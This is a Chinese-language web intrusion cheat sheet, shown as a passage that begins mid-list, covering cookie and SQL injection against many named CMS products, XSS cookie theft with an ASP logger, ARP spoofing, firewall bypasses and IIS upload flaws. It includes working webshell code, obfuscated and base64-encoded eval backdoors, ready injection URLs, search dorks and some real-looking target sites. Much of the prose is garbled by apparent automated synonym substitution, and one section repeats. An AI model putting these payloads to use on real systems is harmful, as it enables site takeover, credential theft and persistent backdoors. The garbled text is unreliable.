3.于Content-Length处加上../uploadfile/后多的字节数。

4.为此C32将空格的20反吗00,保存也1.txt。

5.管1.txt以及nc.exe放在同样目录下,cmd命令:nc -vv www.XXXX.com
80<1.txt

( 如果上污染成后没以木马解析成asp,可以品味用文件称改成成为asa、cer、php
再好就因此IIS 6.0解析漏洞,将文件称改成呢1.asa;1.jpg )

=============================================================================================================================================================

【 抓包nc上污染获管理权限 】

这法子相当给cookie欺骗,首先到前台去登记一个会员,注册成功后当登录的那么一刻,用抓包工具进行逮捕包,把围捕及之数复制到1.txt其中。

连接下去打开,把对引号里棉的多寡“X-Forwarded-For: 127.0.0.2′,group_id = 1
where loginname = ‘会员的帐号’#” 放在Content-Length:的下面。

以探望最下的loginname=这行代码,把最终当之验证码改成为当下会员登陆的验证码,然后拿nc\1.txt
身处同一个索引下,cmd命令:nc 域名 80<1.txt

遂交付上后,刚才的会员帐户将成为管理员帐户了,找到该站的后台地址登录即可兑现cookie欺骗!

=============================================================================================================================================================

【 cookie欺骗 】

当我们经过注入或者社工把管理员的帐号跟md5密码为到手的时刻,却发现破解不生密码
(MD5是16员加密的)

那我们就算得为此COOKIE欺骗来绕了,利用桂林红军的cookie欺骗工具,把好之ID以及md5密码都改成管理员的,再修改cookie,访问时就见面落实欺骗了。

=============================================================================================================================================================

【 cookie中转突破防注入 】

偶然检测一个网站,系统会弹有有SQL防注入的提拔框,这时我们可以使用COOKIE中转注入来开展突破,首先准备一个webshell,然后打开COOKIE中转工具。

复制注入点到“注入URL地址与来源页”处,把问号去丢,再管问号后面的ID=剪切到“注入键名”里,再将ID=后面那个参数剪切到“POST提交值”里替换jmdcw=后面的参数。

点击生成,再管变化的文书上传到webshell里,然后访问路径,再页面地址后加“?jmdcw=参数”,这样搭建构造出的注入点就绕了防护注入了!

上述是在webshell里搭建ASP坏境的法门,下面的是当地架设ASP环境之道:

应用简易IIS服务器搭建筑一个环境,再用COOKIE中转生成的文本放到简易IIS服务器的目下!然后运行简易IIS服务器,在后边+文件名+问号+jmdcw=参数即可。

=============================================================================================================================================================

【 cookie手工突破防注入 】

率先栽艺术:

所以 and 1=1 and 1=2
检测网站是否在注入点时,如果提示而的IP已让记录,就印证系统做了预防注入措施,可以为此代码来突破。

组织者只过滤了and,但是没有过滤or,我们得先猜网站的许段往往 格式:order
by 数字  猜到错为止,然后选前一个针对性之数字!

依照猜到14错,那即便是13了,然后使用Cookie提交变量值,代码:javascript:alert(document.cookie=id=”+escape(“这里填写变量值,例如:id=408″));

启猜解表段,代码:javascript:alert(document.cookie=”id=”+escape(“变量值
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin”));

复制在浏览器里打开,将应运而生一个唤起框,点击确定就会见注射入,再又打开网站(要当此地打开,所以前面最好复制下网站地址)

下一场就是会见冒出些微个提醒数字,比如5跟6,然后以代码的5以及6处猜帐号密码,常见的帐号有:user 
username  密码:pass  password

复制修改后的代码放到浏览器里打开,就会见爆破出网站的帐号密码了。

 

老二栽艺术:

注入点:http://www.XXXXXXXX.gov.cn/shownews.asp?id=4098

率先将?id=408夺丢,然后访问使提示“数据库出错”!就证实网站并未过滤Cookie提交方式,可以采用Cookie欺骗绕了防护注入!

行使Cookie提交变量值,代码:javascript:alert(document.cookie=”id=”+escape(“4098″)

脚开始以Cookie注入中执例行注入攻击,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098
and 1=1″));

访问http://www.XXXXXXXX.gov.cn/shownews.asp 显示正常页面,

更付出代码:javascript:alert(document.cookie=”id=”+escape(“4098 and
1=2″));  显示错误页面!

脚来开始猜解表段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098
and exists (select * from 表段)”));

继之猜字段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098
and exists (select 字段 from admin)”));  例如:username

就猜字段,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098
and exists (select 字段 from admin)”)),   例如:password

脚开始猜测字段往往与字段内容了,提交代码:javascript:alert(document.cookie=”id=”+escape(“4098
and 1=2 union select 1,2,3,4,5,6 from 表段”));

直接猜解到对竣工,这里仅仅是猜测到6,记得继续加减!猜解到对的上,页面会并发数字,然后在互相对应之数字替换字段名,再开展提交代码!

这儿如字段名猜对的话,就会见暴露帐号密码了,不对的言辞继续替换字段名,位置不换!(存在cookie注入时提议参考mysql手工注入的言语)

=============================================================================================================================================================

【 伪静态注入 】

伪静态网站注入方法,莱鸟扫盲来了哦,通常情况下,动态脚本的网站的url类似下面这样:

http://www.91ri.org/news.php?id=111

做了伪静态之后就成为这样了:

http://www.91ri.org/news.php/id/111.html

以斜杠“/”代替了“=”并在最终加上.html,这样一来,就无法直接用工具来注入了。

健康的伪静态页面如下:http://www.XXX.com/play/Diablo.html

诸如关联的动态页面是game.php
,那么当用户访问后先后会自行转换成为类似http://www.XXX.com/game.php?action=play&name=Diablo的形式

注入点检测好据此:http://www.XXX.com/play/Diablo‘
and
1=’1.html与http://www.XXX.com/play/Diablo‘
and 1=’2.html来判断

常备状态下,动态脚本的网站的url类似下面这样:http://www.xxoo.net/aa.php?id=123

举行了伪静态之后类似这样:http://www.xxoo.net/aa.php/id/123.html 以斜杠“/”代替了“=”并于终极加上.html,这样一来,就无法直接用工具来注入了!

=============================================================================================================================================================

【 嗅探 】

当入侵一个网站,该网站没有其它破绽的图景下,可以拓展其它流淌,再提权拿下任意一玉服务器,不行的语就是C段,提权拿下任意一高服务器。

若是会下同网段的随意一玉服务器,就好用C段嗅探来取得主站的帐号密码,cain是同一舒缓强大的架工具。

于服务器里安装cain后打开主控端,点击配置->选择服务器IP一起->在路途由于追踪一项取消一切->确定。

安装完毕后点击一下震动按钮(中间深),再点击嗅探器,点击加号符号,选择有在子网主机,选择ARP测试(传播
31-位),确定。

环视完选择网关一宗,点击ARP,点击加号符号,左边选择网关,右边选择任何底C段,确定,点击开始嗅探按钮(第三只),嗅探到的帐号密码在口令一码展现!

若发现并未多少可以使用幻境网盾来限制网速,让cain的发包快了防火墙。

=============================================================================================================================================================

【 arp欺骗 】

特设欠服务器是C段,都得以品味arp欺骗,用到之家伙是NetFuke,想掌握arp劫持能不能够打响,cmd命令:arp
-a  看一下,动态的服务器IP就会学有所成,静态的即非克。

安装了运行主控端,设置–嗅探设置–网卡选择服务器的IP–控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发”
确定。

安–ARP欺骗–双向欺骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目标IP填要骗的任意C段ip(用御剑扫描C段)–确定。

插件管理–修改器–最后一个增选双击–在右侧边的HTML Body = [haha!!]
填写好只要呈现的仿,点击开始即可欺骗成功!

=============================================================================================================================================================

【 突破安全狗防注入及达传 】

描绘入webshell 写不进来,平常之同一句话 也失效,用当下段代码:

<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“admin163.net”].Value))).CreateInstance(“c”,
true, System.Reflection.BindingFlags.Default, null, new object[] {
this }, null,null); } catch { }%>

连日端用cncert的aspx一词话客户端

2、IIS6.0解析漏洞遇到安全狗

文件称也http://www.baicai.com/1.asp;1.jpg

如此的相会叫IIS安全狗果断屏蔽

改成为如下名称,IIS6一样会分析:

www.baicai.com/;1.asp;1.jpg

3、安全狗的流绕了

常用的如baicai.asp?id=1 and 1=1 凡是会见给平安狗屏蔽的。
唯独这么就算好突破了:

baicai.asp?0day5.com=%00.&id=69%20 and 1=1

=============================================================================================================================================================

【 跨站xss 】

当网站留言或会输入信息的地方付出跨站代码,从而盗走管理员cookie,然后用cookie浏览器直接进去后台,将以下代码保存也asp文件,例如1.asp

 

<%
thisfile=Server.MapPath(“cookie.txt”)
msg=Request(“msg”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉大侠”)
thisfile.close
set fs=nothing
%>

率先多建筑一个asp环境,推荐用“ASP服务器(摆脱安装IIS)”
再用1.asp放在wwwroot目录下,访问1.asp文件要提示下载,则证明搭建成功了。

接下来于留言板的“您的网站”一处在输入:<script>doucument.location=’http://127.0.0.1/1.asp?msg=‘document.cookie</script>

当管理员浏览我们付出的留言时,将在wwwroot目录下生成一个cookie.txt文件,这时我们要看cookie.txt这个文件,就会分晓管理员的cookie是稍稍了!

接下来重新使桂林老兵的cookie欺骗工具或网页源代码查看分析器,访问网站再次输入cookie进行诱骗登录即可!(填cookei的当儿记得选择于定义)

稍技巧:要惦记让管理员早点浏览你付出的留言,可以由此通话,QQ客服等去社工他即可。

=============================================================================================================================================================

【 爆库 】

%5C为十六进制的\符,而数据库大于5.0就可爆库,若一个网站数据库大于5.0,且是ACESS数据库,若未可知注入的注入点是:http://www.xxx.com/rpc/show24.asp?id=127

咱们直接把%5C加至rpc后面,因为%5C是爆二层目录,所以当是这样,http://www.xxx.com/rpc%5c/show24.asp?id=127

而%23是代表#,如果管理员为了防备别人非法下载数据库,而把数据库改化#database.mdb,这样预防了。

要是页面地址为:http://www.xx.com/rpd/\#database.mdb ;
把%23替换#尽管得下载了,即:http://www.xx.com/rpd/%23database.mdb

再有以默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp
如果无改默认的数据库路径,也得以获得数据库的途径(注意:这里的/也使换成%5c)

倘若你能够来看:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个立竿见影的路。
确定路径名称拼写是否对,以及是否连至文件存放的服务器。

如此的即是数据库了。下载时用FLASHGET换成.MDB格式的即使行.

=============================================================================================================================================================

【 利用sql注入点判断网站以及数据库是否站库分离 】

于注入点后长:and exists(select * from admin where 1=(Select (case
when host_name()=@@servername then 1 else 0 end)))

注意admin一定要是是有的表段,如果回去正常,说明网站和数据库是在平等服务器,如果无健康则说明是站库分离的。

=============================================================================================================================================================

【 iis6.0 PUT写副漏洞 】

动工具:IIS PUT Scaner、桂林红军IIS写权限行使程序

1、IIS来宾用户指向网站文件夹来描绘副权限
2、web服务器扩展力设置webDAV为允许,即:WebDAV—打勾
3、网站主目录:写副—打勾(可PUT)
4、网站主目录:脚本资源访问—打勾(可COPY、MOVE)

世家都知晓,写权限就是许PUT,与网站本身运行的权无丝毫挂钩,如果打开了,就是没一点安全意识,就深受咱们提供了大妈的利。

率先用御剑工具扫下C段,比如:12.12.12.1 – 12.12.12.255  打开IIS PUT
Scaner,把12.12.12.1位居Start IP 这里,12.12.12.255放在End IP 这里,

随即以Port这里,换成80,点击Scan开始嗅探,当PUT这里展示是Yes就证实是破绽,可以右键选择PUT
file,输入文件称1.txt,下面填内容,保存就好形容副了。

恐利用“桂林老兵IIS写权限行使程序”也可,这款工具比较强,把域名填写进去,例如:www.xxx.com,然后以请文件那里输入而的文件称,

于数量包格式那里选择PUT,有的会一直弹有浏览文件框,没有就融洽挑,在底下,然后点击提交数据库即可,一般是先PUT一个txt文件,再MOVE成asp木马。

一直付出asp木马的话,如果MOVE方法十分,可以试行Copy。

=============================================================================================================================================================

【 ACCESS执行SQL语句导出一句子话将webshell 】

规律大致与php网站的outfile差不多,在access后高旁方法不克将到webshell,但是后台有SQL语句询问执行,就得直接access导出同样句子话将webshell了。

 

只是要懂得物理路径才会导出,利用IIS的分析漏洞导出EXCEL文件将到webshell,因为ACCESS数据库不允导出其他危险格式,我们导出为EXCEL后每当使用IIS解析漏洞就好成为我们的木马了。

接触“服务器信息探测”,获得网站路径:e:\web\webshellcc\的EXCEL
点“系统管理”-》“自定义执行SQL”,试一下,能够实践之言语可为此access导一句话拿下shell。

create table cmd (a varchar(50))  建立一个起一个A字段的表 表名为cmd
字段类型为字符 长度为50

insert into cmd (a) values (‘<%execute request(chr(35))%>’) 
在表cmd的a字段插入密码吗#的同句话木马

select * into [a] in ‘e:\web\webshellcc\1.asa;x.xls’ ‘excel 4.0;’
from cmd  把cmd表a的情导出到路径e:\web\webshellcc\的EXCEL文件

drop table cmd  删除建立之cmd表

菜刀连接:http://www.xxx.com/1.asa;x.xls

=============================================================================================================================================================

【 利用过滤’or’=’or’修改代码进行绕了 】

比如后台地址是:http://www.hdminc.net/admin/admin_index.asp

当用万力所能及密码登录的时,会现出有过滤or的提拔!

恳请右键查看源文件,另存也桌面
XX.html,然后打开找到以下即段代码,进行删减!

<script language=”javascript”>
function chencklogin()
{
if(document.login.username.value==”)
{alert(‘请输入用户称’);
document.login.username.focus();
return false
}
if (document.login.password.value==”)
{alert(‘请输入密码’);
document.login.password.focus();
return false
}
}
</script>

小心:将以下段代码中之 “index.asp?action=chkadmin” 修改也
“http://www.hdminc.net/admin/admin_index.asp“

<form action=”index.asp?action=chkadmin” name=”login” method=”past”
onsubmit=return checklogin();”>

最终保存打开,再用’or’=’or’登录时,系统就不复过滤,结果虽可知就此万能够密码登录上了!

=============================================================================================================================================================

【 动力3.5拿shell 】

inurl:printpage.asp?ArticleID=

1.找到版权信息,把内容替换成:

版权所有 Copyright? 2003 <a
href=’http://www.asp163.net‘>动力空间</a>”
‘版权信息

if Request(“xiaoxin”)=”520″ then
dim allen,creat,text,thisline,path
if Request(“creat”)=”yes” then
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))
outfile.WriteLine Request(“text”)
Response.write “小新恭喜”
end if
Response.write “<form
method=’POST’action=’”&Request.ServerVariables(“URL”)&”?xiaoxin=520&creat=yes’>”
Response.write “<textarea
name=’text’>”&thisline&”</textarea><br>”
Response.write “<input type=’text’ name=’path’
value=’”&Request(“path”)&”‘>”
Response.write “<input name=’submit’ type=’submit’ value=’ok’
></form>”
Response.end
end if
%>

2.然晚保存,千万别超反其它页面,直接在IE地址栏内将
admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=520

3.中标后会见进来一个如小马一样的页面,粘贴木马代码以及写上木马文件称即可将到wshell,木马在inc目录。

=============================================================================================================================================================

【 动易cms拿shell 】

点击网站配置,在网站称后栽一句话木马,连接inc/config.asp

=============================================================================================================================================================

【 aspcms】

简描述:后台文件AspCms_AboutEdit.asp
未进行认证,且不过滤,导致SQL注入。

崩帐号密码:
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select
1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
from aspcms_user where userid=1

本不同需要变更值。

其次栽方式,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves

直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0

 

&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&

waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn

&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1

&LanguageID=1[/php]

重连接配置文件config.asp 密码也#

始终版被可以经过长模板直接添加asp.但是新版既限制了丰富模板的格式为html,js,css

当然要是碰到iis6的话语或得由此iis6的解析漏洞把文件称反化1.asp;.html这样的格式来以到shell的.

方式:点击“界面风格”,然后择“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句子话<%eval
request(“g”)%>

接下来加上,会提示添加成功,然后于模板列表中不怕好找到我们抬高的等同词话了,用菜刀连接即可!

可是假如遇iis7.5呢?
以下是自我好找到打到的aspcms通杀版本的后台拿shell方法.

1、进入后台,“扩展功能”–“幻灯片设置”–”幻灯样式”

2、使用chorme的对元素功能要firefox的firebug,总之使用能改改时页面元素的家伙就好了,将相应的slidestyle的value的价值修改为1%><%Eval(Request
(chr(65)))%><%

3、一句话木马,密码a。在/config/AspCms_Config.asp

 

=============================================================================================================================================================

【 XYCMS企业建站系统 】

关键词:inurl:showkbxx.asp?id=

默认数据库:data/xy#!123.mdb

默认账户密码:admin admin

找到网站配置,在网站称中直接插入一词话:网站”%><%eval
request(“x”)%><%’,注意不要删掉网站称!然后中国菜刀连接:/inc/config.asp

也许找到网站地址,在http://后面加上一句话木马,然后菜刀链接配置文件:inc/config.asp

=============================================================================================================================================================

【 szwyadmin漏洞绕了后台验证 】

关键字:inurl:szwyadmin/login.asp

javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or’”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or’”));javascript:alert(document.cookie=”admindj=”+escape(“1″));

1.后台一般在一个szwyadmin文件夹,复制一下后台地址位于一边,之后复制代码替换后台地址访问进行注射!

2.这时候会弹有一个窗口,连续点击三不行确定。

3.再访问后台地址,把网站背后的/login.asp 换成 admin_index.asp
奇迹般的直白进后台了!

=============================================================================================================================================================

【 医院打站系统随机文件上污染漏洞 】

关键词:inurl:cms/Column.aspx?
关键词:inurl:cms/Column.aspx?LMID=

漏洞以 :xtwh/upfile.aspx

直白上传aspx木马拿shell。

=============================================================================================================================================================

【 Struts 2远距离执行命令漏洞 】

struts 2同栽java-web的MVC框架技术,和习俗的struts1有非常酷之改进。

严格来说,这其实是XWork的纰漏,因为Struts
2的为主使用的是WebWork,而WebWork又是以XWork来拍卖action的。

关键词:inurl:common/common_info.action?wid=

http://www.xxxxx.com/xxx.action 一般页面以.action结尾的几都存在这个漏洞,可以为此工具检测一下尽管掌握了。

以此漏洞是以Java运行环境下使用的,Java运行条件下载地址:http://www.orsoon.com/Soft/12080.html

=============================================================================================================================================================

【 嘉友科技cms上污染漏洞 】

谷歌关键字:inurl:newslist.asp?NodeCode=

先后采取的高达传页uploadfile.asp未进行管理验证,导致建立畸形目录上传图片木马获取shell漏洞。

exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

 

他原先上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath

而他的上传文件并未过滤导致未授权访问,直接上污染小马,然后小马后面写吗1.jpg 
访问路径 查看源代码。

=============================================================================================================================================================

【 ecshopcms后台拿shell 】

支持新型2.7.2本,通杀最新版本后台低权限!

<?php
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg)
echo chr(79).chr(75).chr(33); @fclose($fp); ?>

后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句子话密码:usb

=============================================================================================================================================================

【 phpcms2008版本 直接实施php代码漏洞 】

关键字:inurl:yp/product.php

exp代码:pagesize=${${@eval_r($_POST[cmd])}}

测试网站:http://www.slsdgc.com.cn/yp/product.php?catid=721

以方式:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}

菜刀连接:http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}} 
密码cmd

菜刀连接注意以下格式:

   默认级别                    php                       gb2312

=============================================================================================================================================================

【 教育站sql注入通杀0day 】

关键词:inurl:info_Print.asp?ArticleID=

默认后台:website/ad_login.asp

比如:http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650

加上:union select
1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from admin

诸如此类虽直拿走了组织者账户和通过Md5加密的密码了。

=============================================================================================================================================================

【 IIS7.0 畸形解析漏洞通杀oday 】

找到有使用IIS7.0架设的站,然后找到中的图片及传点(不需管理权限,普通注册用户即可搞定),把PHP一句话图片木马缀改成.jpg,传上,得到图片地址。

在图片格式后面添加xx.php
xx随便你怎么填,只要后缀为.php就好,之后菜刀连接即可!

=============================================================================================================================================================

【 Yothcms 遍历目录漏洞 】

优斯科技公司网站管理网(YothCMS)是同样款完全开源免费之CMS。

默认后台:admin/login.asp

遍历目录:ewebeditor/manage/upload.asp?id=1&dir=../

数据库路径:%23da%23ta%23\%23db_%23data%23%23.asa

=============================================================================================================================================================

【 传信网络独立开发网站源码0day漏洞 】

默认后台:system/login.asp

编辑器后台路径:ubbcode/admin_login.asp

数据库路径:ubbcode/db/ewebeditor.mdb

默认账号密码:yzm   111111

=============================================================================================================================================================

【 科讯cms 6.5后台拿shell 】

1.好在数据库备份中找到网站的绝对路径

2.采取科讯SQL注入漏洞以工具为能够找到

 

入后台后实施sql命令:
create table
E:\wenxiushi\wz001\\KS_Data\Collect\KS_Collect.Mdb.cmd  (a
varchar(50))
insert into
E:\wenxiushi\wz001\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values
(‘┼攠數畣整爠煥敵瑳∨∣┩愾’)

继数据库备份成1.asp  菜刀连接密码:#

=============================================================================================================================================================

【 动易2006后台拿shell 】

入后台后,我们于左边菜单栏中选取“系统设置”,然后以出现的菜单栏里挑选“自定义页面管理”,

继而要先补加一个自定义页面分类,选择“添加于定义分类”这个选项,分类名和分类简介都得凭填写。填写完毕后择“添加”,系统提醒添加成功。

下再来摘取“添加起定义页面”,“页面名称”随便输入,“所属分类”就是才建立的分类就好了。“页面类型”和“页面路径”都毫无管,保持默认.

然而若是无改页面路径的语句,默认生成的公文是在彻底目录下之,也不怕是http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件称。

“页面简介”也不用无,下面就页面内容了。这里填入小马的代码。一切了点击“添加”会唤醒保存于定义页面成功。最后一步是一旦大成我们的木马页面。

慎选“自定义页面管理首页”,点击右侧出现的“生成本页”就OK
了,成功取动易的shell。

=============================================================================================================================================================

【 Shopex4.8.5 注入漏洞后台拿shell 】

关键词:powered by shopex v4.8.5

exp:

<html>

<head>

<title>Shopex 4.8.5 SQL Injection Exp</title>

</head>

<body>

<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>

<form action=”http://www.lpboke.com/?product-gnotify” method=”post”
name=”submit_url”>

        <input type=”hidden” name=”goods[goods_id]” value=”3″>

        <input type=”hidden” name=”goods[product_id]” value=”1 and
1=2 union select
1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22
from sdb_operators”>

        <input type=”submit” value=””>

</form>

fuck

<body>

</html>

保留也html格式,替换代码中的网站,本地打开后点击小图标,出现新页面,帐号密码爆出来了,默认后台:shopadmin

拿shell方法….

先是步 页面管理 修改模版 然后选一个XML编辑

起来用 live http 抓包 你们知道的 然后将第一只POST包给抓捕出来

下一场改包
id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=

解释一下 id是您选择的沙盘文件夹名称 后面的info.xml 是公改改的XML文件
tmpid= 你们知道的 就是模版文件夹 然后 name 是公提交的公文名字 file_source
是后门或shel

自身这边是千篇一律句话 你们了解的 然后交给了以后
地址是如此的http://Madman.in/themes/文件名称/你的木马名称

=============================================================================================================================================================

【 ecshop漏洞到底汇 】

关键字:powered by ecshop

 

平常代码:user.php?act=order_query&order_sn=’ union select
1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8
from ecs_admin_user/*

变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

直接在网站后令投入代码回车就会暴露帐号密码,再去丢代码加上/admin回车就能够一直上后台了。

 

拿shell方法十分简短,找到“库项目管理”再择“配送的道”,在代码最下面插入php一句话木马:<?php
eval($_POST[x]);?> 不行就换php木马的预代码!

随之保存,一句话路径是:http://www.xxx.org/myship.php%C2%A0;
打开“ASP+PHP两据此Shell.html”填入地址,点击一下环境变量,成功后点击上传文书就得拿shell了。

=============================================================================================================================================================

【 ESPCMS通杀0day 】

关键字:inurl:index.php?ac=article&at=read&did=

默认后台:adminsoft/index.php 或者 admin/

注入点(爆表前缀,比如:cm_admin……前缀就是cm,后面3单代码要自行替换):

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1
from(select count(*),concat((select (select
concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables
where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)%23

爆用户名:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1
from(select count(*),concat((select (select
concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)%23

爆密码:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1
from(select count(*),concat((select (select
concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)%23

密码以及用户一次性爆:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1
from(select count(*),concat((select (select
concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)%23

拿shell:

迈进至后台后,直接点击分类图片===修改==选择文件===直接上传一模一样句话木马

PS:
当及污染不了php网马时,去系统安装一下,添加图片及传格式 |php
这样就算足以上传一个图纸文件头之网马。

=============================================================================================================================================================

【 帝国cms 6.6最新版本 】

打定义页面-增加从定义页面-随便写单.php文件称,内容写:<script
language=”php”>echo
base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script>

倘情节一直上一句子话或php大马是废的,因为他会晤生成xxx.php前先被您行,

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php
@eval($_POST[‘cmd’]);?> 的base64加密。

因而生成xxx.php后 会产出内容 <?php @eval($_POST[‘cmd’]);?>
在文件里,然后据此菜刀直接连接吧。

=============================================================================================================================================================

【 phpweb 】

关键字:inurl:down/class/index.php?myord=

后台地址:admin.php

万力所能及密码:admin ‘or ’1′=’1

流入地址:down/class/index.php?myord=1

表段:pwn_base_admin

拿shell通好漏洞:登入后台–文章–文章发布–文章内容里的图片上传按钮–抓包之后改包NC提交。

呢可以用脚的exp拿shell:

据此火狐浏览器登录后台,因为火狐浏览器有保留cookies的职能,
找到“phpweb之exp”这个html,拉上火狐浏览器器里及传1.php;.jpg的一模一样句子话木马,查看源码菜刀连接!

=============================================================================================================================================================

【 动科(dkcms)漏洞分析 】

官方网站:www.dkcms.com

 

首要是差不多3个版本为主吧,

V2.0   data/dkcm_ssdfhwejkfs.mdb

V3.1   _data/___dkcms_30_free.mdb

V4.2   _data/I^(()UU()H.mdb

默认后台:admin

编辑器:admin/fckeditor

有鉴于此,官方安全意识挺差的,至于后台拿shell,fck编辑器突破但拿shell

建立asp文件夹

Fck的路径:Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

=============================================================================================================================================================

【 ESPCMS通杀0day 】

百度关键字:inurl:index.php?ac=article&at=read&did=

默认后台:adminsoft/index.php

注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags)
or(select 1 from(select count(*),concat((select (select
concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables
where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)%23

爆帐号:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1
from(select count(*),concat((select (select
concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)%23

爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1
from(select count(*),concat((select (select
concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)%23

帐号以及密码一次性爆:index.php?ac=search&at=taglist&tagkey=%2527,tags)
or(select 1 from(select count(*),concat((select (select
concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit
0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a)%23

迈入至后台后,直接点击分类图片-修改-选择文件-直接上传php一句话木马

PS:当上传不了php木马时,去系统设置一下,添加图片及传格式 |php
,这样尽管可以上传一个图形文件头之php木马。

=============================================================================================================================================================

【 Thinkphp框架任意代码执行漏洞 】

ThinkPHP是一律款款国内采用比较大的显赫PHP
MVC框架,官方已经宣布修复漏洞的补丁,地址:http://thinkphp.cn/down-116.html

重点字:thinkphp intitle:系统有误

收获Thinkphp的本子号:index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

取服务器的布置信息:index.php/module/aciton/param1/${@phpinfo()}

排有网站有着文件列表:index.php/module/action/param1/{${system($_GET[‘x’])}}?x=ls
-al

直在网页执行同一句话:index.php/module/action/param1/{${eval($_POST[s])}}

菜刀连接:http://www.xxx.com/index.php/module/action/param1/{${eval($_POST[s])}}  
密码:s

=============================================================================================================================================================

【 良精系统 】

( 爆管理员帐号密码的代码 )

NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’

